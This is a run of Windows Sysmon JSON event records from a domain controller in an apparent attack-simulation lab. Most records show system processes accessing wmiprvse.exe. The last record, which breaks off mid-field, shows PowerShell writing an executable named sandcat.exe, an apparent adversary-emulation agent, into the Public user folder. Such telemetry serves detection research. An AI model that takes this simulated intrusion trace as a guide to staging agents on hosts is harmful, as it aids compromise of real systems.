{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1003,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1004,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1005,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.235\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2388\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.235","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2388","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1006,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.266\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.266","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1007,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.266\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.266","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1008,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.266\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.266","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1009,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.266\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.266","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1010,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:33.266\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:33.266","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1011,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:46:33.672\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-00103D410100}\r\nProcessId: 2180\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Public\\sandcat.exe\r\nCreationUtcTime: 2020-08-01 05:46:33.672","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 